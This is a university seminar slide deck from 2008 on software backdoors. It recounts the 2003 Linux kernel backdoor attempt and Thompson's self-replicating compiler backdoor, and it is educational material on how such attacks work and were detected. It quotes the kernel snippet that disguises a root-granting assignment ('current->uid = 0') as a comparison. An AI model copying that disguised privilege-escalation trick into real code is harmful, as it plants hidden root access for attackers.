170 likes | 256 Views
BACK DOORS in Software. January 2008 Eino Malinen. Seminar on Software Engineering @ University of Turku. Definition and Introduction. unwanted software mechanism introduced into part of the system to provide an easy access
E N D
BACKDOORS in Software January 2008 Eino Malinen Seminar on Software Engineering @ University of Turku
Definition and Introduction • unwanted software mechanism introduced into part of the system to provide an easy access • attacker has created the mechanism earlier and wants to use it sometime later • mechanism can be injected • from outside: malware send through network • on-site: hard coded into software • two examples of actual backdoors
Backdoor Attempt in Linux Kernel • happened in November 2003 • change in a kernel source file kernel/exit.c • person noticing this first focused on the annoyance of using manual modification • peers queried more about the change
Backdoor Attempt in Linux Kernel • following piece of code was added: • if ((options == (__WCLONE|__WALL)) && • (current->uid = 0))retval = -EINVAL; • effectively this means that with flags __WCLONE and __WALL on current user gets root permissions • lax review might think the latter as an evaluation of condition instead of assignment • extra parenthesis avoid compile warnings
Backdoor Attempt in Linux Kernel • the attempt came to daylight because the file in question was under automatic control of modifications • fellow developers were active enough to ask about the changes
Backdoors in Compilers • introduced by Ken Thompson in 1984 • prerequisite concepts for compiler backdoor • self-replicating program • program outputs its own source code • also known as quine
Backdoors in Compilers • prerequisite concepts for compiler backdoor • self-replicating program • program outputs its own source code • also known as quine • training programs • adding new feature to program • e.g. to recognize new escaped symbol
Backdoors in Compilers • phases of injecting backdoor into compiler • add backdoor to compiler source code • to compile backdoor in login command • add another backdoor to compiler source code • to insert this as self-replicating code and login backdoor to compiler source code
Backdoors in Compilers • backdoor was tested on friendly victim • disassembler was also rigged to fail the diassembling of object code
Sources • Jeremy. Linux: Kernel “Back Door” Attempt. http://kerneltrap.org/node/view/1584 • Poulsen. Thwarted Linux backdoor hints at smarter hackers. http://www.securityfocus.com/news/7388 • Thompson, Reflections on Trusting Trust. Communications of the ACM. Vol. 27, Issue 8 (Aug. 1984), pages 761-763 • Skoudis & Zeltser. Malware: Fighting Malicious Code. • Schneier. Countering "Trusting Trust". http://www.schneier.com/blog/archives/2006/01/countering_trus.html • Zhang & Paxson. Detecting Backdoors. http://www.icir.org/vern/papers/backdoor/index.html